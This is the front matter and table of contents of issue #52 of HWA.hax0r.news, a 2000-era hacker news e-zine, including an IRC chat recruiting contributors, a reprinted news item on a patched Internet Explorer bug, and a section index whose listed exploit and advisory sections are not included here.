Copy Link
Add to Bookmark
Report

hwa-hn52

eZine's profile picture
Published in 
HWA
 · 5 years ago
5

  

[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 52 Volume 2 Issue 4 1999 Apr 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
= "ABUSUS NON TOLLIT USUM" =
==========================================================================

Editor: Cruciphux (cruciphux@dok.org)
A Hackers Without Attitudes Production. (c) 1999, 2000
http://welcome.to/HWA.hax0r.news/


*** NEW WEB BOARD NOW ACTIVE ***

http://discserver.snap.com/Indices/103991.html

==========================================================================

____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/


This is #52 covering Mar 13th to April 9th , 2000

** 564 People are on the email notify list as of this writing.


see note below in the Help Out! section re:distribution.



==========================================================================


_ _ _ ___ _ _
| | | | ___| |_ __ / _ \ _ _| |_| |
| |_| |/ _ \ | '_ \| | | | | | | __| |
| _ | __/ | |_) | |_| | |_| | |_|_|
|_| |_|\___|_| .__/ \___/ \__,_|\__(_)
|_|





WANT TO HELP? like what can I do? some answers to common questions, taken
straight from IRC since, well why re-write it? :)


** Regarding the people on the email notification list with listbot.

We now have a new listserv system setup with help from the generous
people of the CCC (Chaos Computer Club) in Germany. If you haven't
heard of CCC or don't know who they are you've been living under a
rock ;)

I am still working on the system it may or may not be ready for use
as of this release, certainly it should be accessible for the next
one, soon you will be able to receive the newsletter/zine directly
delivered to your inbox (yay!). Stay tuned - Ed



Early one night in #Hwa.hax0r.news ...

<SugarKing> Cruciphux: so do you really need help? cause I can start getting
articles for ya if you want/need them
<Cruciphux> yes
<Cruciphux> damnit
<Cruciphux> I do need help
<SugarKing> so what do I do.....look for articles...copy and paste them.....
then hand them to you?
<Cruciphux> what do you want to do?
<Cruciphux> if you wanna do that sure, email em to me like that
<Cruciphux> must have a source and or url though
<SugarKing> ok
<Cruciphux> ppl always forget urls/sources and I can't print it without a
source
<Cruciphux> if u do and I haven't already put the info in you 'win' a
Contributed by: space sn00zer! line under the article
<Cruciphux> :)
<SugarKing> hehe
<Cruciphux> and if yer good at it and get stuff I've never seen (like isn't
on my excite newsbot list or on HNN etc) then you get
<Cruciphux> promoted to 'staff'
<Cruciphux> etc
<Cruciphux> I should put this in there actually so ppl know what to expect
<SugarKing> ok cool
<Cruciphux> and original articles? i'd kill for good original material
<SugarKing> heh
<Cruciphux> stress on the 'good' but i'm not too picky if someone wants to make
a fool of themselves in public.
<Cruciphux> :-o
<SugarKing> so what kinda of articles.....anything? from programming to
hacking....etc?
<Cruciphux> pretty much
<SugarKing> heh
<Cruciphux> technology, radio, science if it has a techno slant, and of course
internet/web security and hacking related
<Cruciphux> u know the drill
<SugarKing> yeah
<Cruciphux> also
<SugarKing> just checkin...
<SugarKing> heh
<Cruciphux> I need someone to do 'research' on web site defacements
<Cruciphux> an adjunct to what attrition does
<Cruciphux> like tell me about interesting defacements, I just print the sites
list i get from attrition
<SugarKing> like how....person who defaced......??.......??
<SugarKing> ohh ok
<Cruciphux> theres a mailing list you can get on that tells you when sites get
cracked
<Cruciphux> thats a biggie i'm gonna be asking for in this issue
<Cruciphux> print the 'good' defacements (shit with an angle) and track down/
identify defacers and groups
<Cruciphux> etc
<SugarKing> ok cool:)
<Cruciphux> with an eye towards possible profiles (group) and interviews
(if they're doing something interesting)
<Cruciphux> anything else?
<SugarKing> that looks good:)
<SugarKing> it doesn't seem that hard when you hear about people doing it
<Cruciphux> k lemme know if you wanna do anything and lemme know what you want
to do etc
<SugarKing> but now it sure seems harder than expected
<Cruciphux> heh
<SugarKing> but it'll give me something to do at least
<Cruciphux> well I do everything myself right now in free time and there are
areas that i'd like to follow up on nad I just don't have the time
<Cruciphux> so if ppl are willing to help i can keep putting out and hopefully
things will get better too.
<SugarKing> well....I'll do anything you want me to do.....but following up on
defacements and getting articles seems good right now
<Cruciphux> otherwise i'd have to think about either downsizing or closing down
and I don't want to do that really.
<Cruciphux> ok good stuff
<Cruciphux> local and 'small' stuff like whats going on at your schools computer
lab ie: security policies is good angles for writing your own stuff
too if that tickles your fancy
<Cruciphux> doesn't have to be major world news
<Cruciphux> *g*
<SugarKing> ok
*** Quits: narq (I am free of all prejudices. I hate everyone equally)

-=-

And, sending in articles etc...

Instead of emailing me this: (txt formatted to 80 cols)

<->


Patching IE Security, Yet Again


Security vulnerability affects the Win 2000 browser.

Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.

The bug, which Microsoft calls the Image Source Redirect vulnerability, makes
it possible for a malicious Web site operator to read certain types of files
on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0,
and 5.01.

This means that the iteration of IE that is distributed with Windows 2000,
version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser window.
IE then checks the server's permissions on the new page.

The vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time, and
the Web site operator would need to know, or guess, the names and locations of
files. The operator would also be able to view only file types that can be
opened in a browser window, including .txt files, Microsoft says.


http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html



<->

::
YOU can go ahead and do some editing yourself and send it like this:
::

<->


Patching IE Security, Yet Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by SugarKing

Security vulnerability affects the Win 2000 browser.

Source: PCworld
url: http://www.pcworld.com/pcwtoday/article/0,1510,15340,00.html


Windows 2000 is finally here. And so is a patch for a security vulnerability
in the Internet browser that is bundled with the new operating system.
Microsoft issued the patch on Wednesday, the eve of the release of its
much-delayed operating system.

The bug, which Microsoft calls the Image Source Redirect vulnerability, makes
it possible for a malicious Web site operator to read certain types of files
on the computers of visitors using Internet Explorer versions 4.0, 4.01, 5.0,
and 5.01.

This means that the iteration of IE that is distributed with Windows 2000,
version 5, also is affected by the bug.

When you want to view a new page with a different domain than the one
currently being viewed, a Web server sends the page to your IE browser window.
IE then checks the server's permissions on the new page.

The vulnerability makes it possible for a Web server to open a browser window
to a file stored on the IE user's computer, and then switch to a page in the
server's domain, gaining access to the contents of the user's files in the
process, Microsoft says in a statement.

Any data that can be seen is accessible only for a short period of time, and
the Web site operator would need to know, or guess, the names and locations of
files. The operator would also be able to view only file types that can be
opened in a browser window, including .txt files, Microsoft says.

@HWA


<->

::

Doesn't seem like much but saves me a bunch of work and I can plug it straight into
the zine text...


-=-

Etc .. any other questions/comments/ideas/etc email me, you know
the addy...

-=-



@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=


____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|



SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>



@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ...

=-----------------------------------------------------------------------=


"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"

- kf


____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|

Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news

**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************





=--------------------------------------------------------------------------=


_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/



=--------------------------------------------------------------------------=
[ INDEX ] HWA.hax0r.news #52
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. LEGAL & COPYRIGHTS ..............................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. THIS IS WHO WE ARE ..............................................

ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=


"
The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown



01.0 .. GREETS ...........................................................
01.1 .. Last minute stuff, rumours, newsbytes ............................
01.2 .. Mailbag ..........................................................
02.0 .. From the Editor...................................................
03.0 .. Clearing up a nasty screw up in issue #51, here's what happened...
04.0 .. HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!...................
05.0 .. WebTV hit by "
Melissa-Type" virus.................................
06.0 .. BlaznWeed interview, background info, exploit code and Sect0r.....
07.0 .. plusmail cgi exploit..............................................
08.0 .. 2600 activism against the MPAA....................................
09.0 .. Microsoft sends magazine full versions of Windows 2000............
10.0 .. HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ...........
11.0 .. HNN:Mar 13th:Online Guerrilla War Rages In Brazil ................
12.0 .. HNN:Mar 13th:French Bank Card Algorithm Released .................
13.0 .. HNN:Mar 13th:Still No Suspects in DDoS Attacks ...................
14.0 ,, HNN:Mar 13th:Japanese Pirates Busted .............................
15.0 .. HNN:Mar 13th:Online Handles Impose Fear ..........................
16.0 .. HNN:Mar 13th:Vendors Still Making Insecure Software ..............
17.0 .. HNN:Mar 14th:Smart Card Inventor Issues Challenge ................
18.0 .. HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ........
19.0 .. HNN:Mar 14th:Tracking Down Coolio.................................
20.0 .. HNN:Mar 14th: DOJ Launches Cybercrime Site .......................
21.0 .. HNN:Mar 14th: China Relaxes Crypto Rules .........................
22.0 .. HNN:Mar 14th:Stallman on UCITA ...................................
23.0 .. HNN:Mar 14th:What Exactly Does TRUSTe Mean Anyway?................
24.0 .. HNN:Mar 15th: UCITA Sign By Governor in Virginia ................
25.0 .. HNN:Mar 15th:RIP Goes Before Commons Today .......................
26.0 .. HNN:Mar 15th:Security Patch Locks Out Users ......................
27.0 .. HNN:Mar 15th:DNA Used for Steganography ..........................
28.0 .. HNN:Mar 15th:Bugging SAT Phones ..................................
29.0 .. HNN:Mar 15th:More and more EZines ................................
30.0 .. HNN:Mar 16th:Army on Alert Over CyberAttack Fear ................
31.0 .. HNN:Mar 16th:NASA Fears CyberAttack From Brazil ..................
32.0 .. HNN:Mar 16th:FBI Site Hit by DOS Again ...........................
33.0 .. HNN:Mar 16th:Teenager Arrested in Online Bank Scam ...............
34.0 .. HNN:Mar 16th:Former Employee Arrested For Attack On Company ......
35.0 .. HNN:Mar 16th:PlayStation2 can Play US DVD ........................
36.0 .. HNN:Mar 16th:ISTF Releases Security Recommendations ..............
37.0 .. HNN:Mar 17th:485,000 Credit Cards #s Stolen, Found on Gov Comp....
38.0 .. HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks .......
39.0 .. HNN:Mar 17th:Secret Service Harassing Bernie S Again .............
40.0 .. HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud.
41.0 .. HNN:Mar 17th:Computer History Lecture Series .....................
42.0 .. HNN:Mar 17th: Australian Police To Increase Online Presence ......
43.0 .. HNN:Mar 17th:Apex DVD Defeats Region and Macrovision .............
44.0 .. HNN:Mar 20th:First Malicious Code Direct at WebTV ................
45.0 .. HNN:Mar 20th:Liberia Claims Attack In CyberWar ...................
46.0 .. HNN:Mar 20th:Judge Bans Anti-Filter Software .....................
47.0 .. HNN:Mar 20th:We Spy To Prevent Bribes ............................
48.0 .. HNN:Mar 20th:LAPD Tells Parody Site To Chill .....................
49.0 .. HNN:Mar 20th:New Windows Worm Virus ..............................
50.0 .. HNN:Mar 20th:GNIT Now Freeware ...................................
51.0 .. HNN:Mar 20th:Online Criminals Labeled Boffins ....................
52.0 .. HNN:Mar 21st: Conflict In Kashmir Continues Online ...............
53.0 .. HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack .........
54.0 .. HNN:Mar 21st:2600 AU to Broadcast DeCSS ..........................
55.0 .. HNN:Mar 21st:CIA Monitoring Upheld by Court ......................
56.0 .. HNN:Mar 21st:Make Your Reservations for RootFest Now! ............
57.0 .. HNN:Mar 22nd:Cybercrime On The Rise ..............................
58.0 .. HNN:Mar 22nd:The Next Version of Windows Leaked ..................
59.0 .. HNN:Mar 22nd:Toronto Business Held For Extortion .................
60.0 .. HNN:Mar 22nd:Is the Census Secure? ...............................
61.0 .. HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ..........
62.0 .. HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ............
63.0 .. HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ......
64.0 .. HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ...........
65.0 .. HNN:Mar 23rd:Business May Be Protected Against FOIA ..............
66.0 .. HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ............
67.0 .. HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set ....
68.0 .. HNN:Mar 24th:Max Vision Indicted in San Jose .....................
68.1 .. KYZSPAM: More on Max Vision bust..................................
69.0 .. HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ...........
70.0 .. HNN:Mar 24th:Rack Mount Your iMac ................................
71.0 .. HNS:Mar 24th:SECRETS STOLEN.......................................
72.0 .. HNS:Mar 24th:PATCH RELEASED BY TREND MICRO........................
73.0 .. HNS:Mar 24th:PRIVACY ISSUES.......................................
74.0 .. HNS:Mar 24th:TARGETING ONLINE SCAMMERS............................
75.0 .. HNS:Mar 24th:FEARS OF FREENET.....................................
75.1 ...(More) Anonymous net access aiding and abetting online criminals?.
76.0 .. HNS:Mar 24th:FEDERAL CIO NEEDED...................................
77.0 .. HNS:Mar 24th:DETERRENT SENTENCES..................................
78.0 .. HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC...........................
79.0 .. HNS:Mar 23rd:ALTERING WEB SITES...................................
80.0 .. HNS:Mar 23rd:SECURITY BREACHES....................................
81.0 .. HNS:Mar 23rd:ATTACK COSTS RISE....................................
82.0 .. HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS....................
83.0 .. HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY....................
84.0 .. HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT...........................
85.0 .. HNS:Mar 23rd:"
ANTI-ARAB" BUG......................................
86.0 .. HNS:Mar 23rd:OFFICE 2000 PATCHES..................................
87.0 .. HNS:Mar 23rd:SHARING INFORMATION..................................
88.0 .. HNS:Mar 23rd:MONITORING WITH GOOD RESULTS.........................
89.0 .. HNS:Mar 23rd:CRIME FIGHTING LAB...................................
90.0 .. HNS:Mar 23rd:HUNTING CROATIAN PIRATES.............................
91.0 .. HNS:Patch available for OfficeScan vulnerability..................
92.0 .. HNS:Gpm-root problems.............................................
93.0 .. HNS:Esafe Protect Gateway (CVP) problems..........................
94.0 .. HNS:Bug in Apache project: Jakarta Tomcat.........................
95.0 .. HNS:MS SECURITY BULLETIN #18......................................
96.0 .. HNS:S.A.F.E.R. Security Bulletin 000317...........................
97.0 .. HNS:Decon fix for con/con is vulnerable...........................
98.0 .. HNS:Cerberus Information Security Advisory........................
99.0 .. HNS:Malicious-HTML vulnerabilities at deja.com....................
100.0 .. HNS:Certificate Validation Error in Netscape Browsers.............
101.0 .. HNS:"
OfficeScan DoS & Message Replay" Vulnerability...............
102.0 .. HNS:MS Security bulletin#17.......................................
103.0 .. HNS:Georgi Guninski security advisory #9..........................
103.1 .. PSS:More MSIE crashing info by NtWakO.............................
104.0 .. HNS:Drive Mappings in Interactive Login...........................
105.0 .. HNS:DoS Attack in MERCUR WebView .................................
106.0 .. HNS:Problem with Firewall-1.......................................
107.0 .. HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b.................
108.0 .. HNS:Extending the FTP "
ALG" vulnerability ........................
109.0 .. FreeBSD-SA-00:08: Lynx overflows..................................
110.0 .. Curador? BUSTED...................................................
111.0 .. PSS: Shaft Distributed DoS tool analysis Sven Dietrich............
111.1 .. PSS: Shaft Node/Master analysis by Rick Wash & Jose Nazario.......
112.0 .. Wrapster, the Napster hack fires up the trading fires.............
113.0 .. AceFTP vulnerabilty by Armour.....................................
114.0 .. Pursuit Zine #1 (Aug 99)..........................................
115.0 .. SecurityFocus.com Newsletter 33...................................
116.0 .. You can get into trouble for hacking!.............................
117.0 .. SSHD v2.0.11< (old) Watch your version numbers!...................
118.0 .. BBC:"
Outdoing the hackers"........................................
119.0 .. HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more).
120.0 .. HNN:Mar 27th:Inferno Busted in Brazil ............................
121.0 .. HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth ..........
122.0 .. HNN:Mar 27th:PalmPilot WarDialer Released ........................
123.0 .. HNN:Mar 27th:Mi5 Computer Stolen .................................
124.0 .. HNN:Mar 27th:"
HNN Wins Bad Ass Media Award".......................
125.0 .. HNN:Mar 28th:French Ban Anonymous Internet........................
126.0 .. HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ........
127.0 .. HNN:Mar 28th:2600 Under Fire From NBC ............................
128.0 .. HNN:Mar 28th:Takedown Debuts in France ...........................
129.0 .. HNN:Mar 28th:Mattel Buys Rights to CPHack ........................
130.0 .. HNN:Mar 28th:Cyber Security Bill Passes Committee ................
131.0 .. HNN:Mar 28th:Census Gets NSA to Look at Security .................
132.0 .. HNN:Mar 28th:Icomlib 1.0.0 Final Released ........................
133.0 .. HNN:Mar 28th:China Bans MP3s .....................................
134.0 .. HNN:Mar 29th:MostHated to Plead Guilty ...........................
135.0 .. HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier ........
136.0 .. HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits .......
137.0 .. HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag........
138.0 .. HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes....
139.0 .. HNN:Mar 29th:Another DVD Work Around on PlayStation 2.............
140.0 .. HNN:Mar 29th:Interview with Attrition Staff Posted................
141.0 .. HNN:Mar 29th:The Unfairness of Computer Crime Sentences...........
142.0 .. HNN:Mar 29th:@tlanta Con to be Held this Weekend..................
143.0 .. HNN:Mar 30th:MostHateD Busted for Burglary and Theft..............
144.0 .. HNN:Mar 30th:Miramax Sued for Fugitive Game.......................
145.0 .. HNN:Mar 30th:Glassbook Shattered..................................
146.0 .. HNN:Mar 30th:Yahoo Sued Over Piracy...............................
147.0 .. HNN:Mar 30th:Italian University Attacked by Brazilian Intruders...
148.0 .. HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions..........
149.0 .. HNN:Mar 30th:Australia To Protect Privacy of Works................
150.0 .. HNN:Mar 31st:Y2Hack Goes on in Israel.............................
151.0 .. HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil....
152.0 .. HNN:Mar 31st:China Sets Up security Test Center...................
153.0 .. HNN:Mar 31st:Hackers Probe Physical Security of MIT...............
154.0 .. HNN:Mar 31st:DVD for Linux is Now Legal...........................
155.0 .. HNN:Mar 31st:Y2K Survivalists Come Out of Hiding..................
156.0 .. CoreZine: New zine by lamagra of b0f..............................
157.0 .. Paper:Some Extra Security In The Linux Kernel - Auditfile by {}...
158.0 .. Lets hack an NT box...how they are being defaced & how to secure..
159.0 .. Hijack any .nu domain box (DoS/redirection/hijack)................
160.0 .. The dreaded and most pheared return of the infamous GOAT!.........
161.0 .. b0f: exploit code to hang any linux machine by eth0...............
162.0 .. HNN:Apr 3rd:NIPC Issues Alert on New Self-Propagating 911 Script..
163.0 .. HNN:Apr 3rd:Mixter Convicted of "
Computer Sabotage" ..............
164.0 .. HNN:Apr 3rd:Forget Cookies, Worry About Cache ....................
165.0 .. HNN:Apr 3rd:Identity Theft On the Rise ...........................
166.0 .. HNN:Apr 3rd:Computer Crime Laws ..................................
167.0 .. HNN:Apr 4th:Computers Turned Into Bombs Via The Net...............
168.0 .. HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book........
169.0 .. HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP..........
170.0 .. HNN:Apr 4th:Federal Web Site Security Called Weak (Again).........
171.0 .. HNN:Apr 4th:Germans Propose Strike Force For Net Defense..........
172.0 .. HNN:Apr 4th:New Mags are Now Available............................
173.0 .. HNN:Apr 5th:De Beers Releases Personal Info.......................
174.0 .. HNN:Apr 5th:CFP In Toronto........................................
175.0 .. HNN:Apr 5th:Enigma Machine Stolen From Museum.....................
176.0 .. HNN:Apr 5th:Thailand Police Form Cyber Crime Panel................
177.0 .. HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked..............
178.0 .. HNN:Apr 6th:DoubleClick Wins Privacy Award........................
179.0 .. HNN:Apr 6th:ACLU Appeals CPHack Ruling............................
180.0 .. HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking...........
181.0 .. HNN:Apr 6th:Enigma Suspect Busted.................................
182.0 .. HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate........
183.0 .. HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses.......
184.0 .. HNN:Apr 6th:History of the L0pht, Part 1..........................
185.0 .. HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech...
186.0 .. HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors.......
187.0 .. HNN:Apr 7th:Links to Web Sites Illegal............................
188.0 .. HNN:Apr 7th:British Companies Complacent..........................
189.0 .. HNN:Apr 7th:Trio Becomes First Internet Crime Conviction for Hong Kong
190.0 .. HNN:Apr 7th:Census Afraid of Electronic Intrusion.................
191.0 .. HNN:Apr 7th:Hardware Key Logger Introduced........................
192.0 .. HNN:Apr 7th:Napalm Issue 4........................................
193.0 .. HNS:Apr 8th:NEW KIND OF SECURITY SCANNER..........................
194.0 .. HNS:Apr 8th:WAYS TO ATTACK........................................
195.0 .. HNS:Apr 7th:STOLEN ACCOUNTS.......................................
196.0 .. HNS:Apr 7th:JAILED FOR SIX MONTHS.................................
197.0 .. HNS:Apr 7th:PcANYWHERE WEAK PASSWORD ENCRYPTION...................
198.0 .. HNS:Apr 7th:NET PRIVACY TOOLS.....................................
199.0 .. HNS:Apr 7th:SECURITY ADDITIONS....................................
200.0 .. HNS:Apr 7th:COOKIES...............................................
201.0 .. HNS:Apr 7th:SECURE E-MAIL SERVICE.................................
202.0 .. HNS:Apr 7th:ONLINE MUGGERS........................................
203.0 .. HNS:Apr 6th:SURVEY BY DTI.........................................
204.0 .. HNS:Apr 6th:COMPUTER CODES PROTECTED..............................
205.0 .. HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT.....................
206.0 .. HNS:Apr 6th:CYBERPATROL BLOCK LIST................................
207.0 .. HNS:Apr 5th:CRYPTO REGULATIONS....................................
208.0 .. HNS:Apr 5th:GFI AND NORMAN TEAM UP................................
209.0 .. HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE.................
210.0 .. HNS:Apr 5th:BUFFER OVERFLOWS......................................
211.0 .. HNS:Apr 5th:PIRACY................................................
212.0 .. HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER..................
213.0 .. HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION...................
214.0 .. HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY.................
215.0 .. HNS:Apr 4th:FIGHT SPAM WITH SPAM..................................
216.0 .. HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW............................
217.0 .. ISN:Mar 18th:Serbs hacked Britain's top-secret military computers.
218.0 .. March 15th: CRYPTOGRAM newsletter.................................
219.0 .. ISN:Mar 18th:Microsoft fends off hackers with Windows 2000........
220.0 .. ISN:Feds Behind Recent Massive Web Hacking/Fwd....................
221.0 .. ISN:Hacker 'Gatsby' Gets 18-Month Sentence........................
222.0 .. ISN:Naval officer in hot water over policy........................
223.0 .. ISN:Police to step up fight against e-crime.......................
224.0 .. ISN:Developers blasted on security................................
225.0 .. ISN:"
Islands in the clickstream, in defense of hacking"...........
226.0 .. ISN:Man angry at employer swallows own head.......................
227.0 .. ISN:Nasa division battles the hack from ipanema...................
228.0 .. ISN:Toys'R'Us.....................................................
229.0 .. ISN:Computer expert accused of hacking............................
230.0 .. ISN:Disney and Miramax Sued for 'Hacking'.........................
231.0 .. ISN:Hacker posts own version of Gore's speech online..............
232.0 .. ISN:Bennett leads cyber defense...................................
233.0 .. ISN:Hackers rue blurred line between curiosity, vandalism.........
234.0 .. ISN:Curador worked as e-commerce consultant.......................
235.0 .. ISN:White house official charged with spreading phone codes.......
236.0 .. ISN:Hackers hold conference in Israel.............................
237.0 .. ISN:Old school MIT stylie "
hacking" still makes news?.............
238.0 .. ISN:US Census tests security......................................
239.0 .. ISN:Visa program targets online fraud.............................
240.0 .. ISN:GAO lists security bargains...................................
241.0 .. ISN:DeBeers leaks customer info...................................
242.0 .. ISN:Cybersleuths want to hack bill of rights......................
243.0 .. ISN:Third laptop gets lifted......................................
244.0 .. ISN:Government suck rocks at busting computer criminals...........
245.0 .. CanSecWest/core00 Canadian Security Conf..........................
246.0 .. PSS: BeOs Network DoS.............................................
247.0 .. PSS: TESO Security Advisory BinTec router weakness................
248.0 .. b0f: namedscan.c..................................................
249.0 .. PSS:Advisory: MailForm v1.91 for Windows 95 and NT 4.0............
250.0 .. PSS: CGI rmp_query scanner........................................
251.0 .. PSS: New ircii exploit............................................
252.0 .. PSS:Cerberus Information Security Advisory (CISADV000330).........
253.0 .. PSS:Win32 Realplayer 6/7 Buffer Overflow..........................
254.0 .. ISS Security summary data sheet...................................
255.0 .. PSS: suse kreatecd root compromise................................
256.0 .. PSS: irix object server remote root exploit.......................
257.0 .. PSS: Sun bind advisory............................................
258.0 .. Cyberprofiling....................................................
259.0 .. mIRC 5.7 Exploit code.............................................
260.0 .. Spaghetti proxy server exploit code...............................
261.0 .. schoolbus.c - netbus 1.7 client exploit crashes script kids box...
262.0 .. Protocol reverse engineering using Sub7 as an example.............
263.0 .. Essay:Elf Orin: The meaning of being a hacker.....................
264.0 .. Linux 2.2.x masq tunnel/hijack scenerio...........................
265.0 .. AWARD Bios password cracker .c source code........................
266.0 .. Locked out? default BIOS/CMOS password list.......................

=-------------------------------------------------------------------------=


AD.S .. Post your site ads or etc here, if you can offer something in
return thats tres cool, if not we'll consider ur ad anyways so
send it in.ads for other zines are ok too btw just mention us
in yours, please remember to include links and an email contact.

Ha.Ha .. Humour and puzzles ............................................

Oi! laddie! send in humour for this section! I need a laugh
and its hard to find good stuff... ;)...........................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
* COMMON TROJAN PORTS LISTING.....................................
A.1 .. PHACVW linx and references......................................
A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site)
A.3 ,, Mirror Sites list...............................................
A.4 .. The Hacker's Ethic 90's Style..................................
A.5 .. Sources........................................................
A.6 .. Resources......................................................
A.7 .. Submission information.........................................
A.8 .. Mailing lists information......................................
A.9 .. Whats in a name? why HWA.hax0r.news??..........................
A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again).
A.11 .. Underground and (security?) Zines..............................

* Feb 2000 moved opening data to appendices, A.2 through A.10, probably
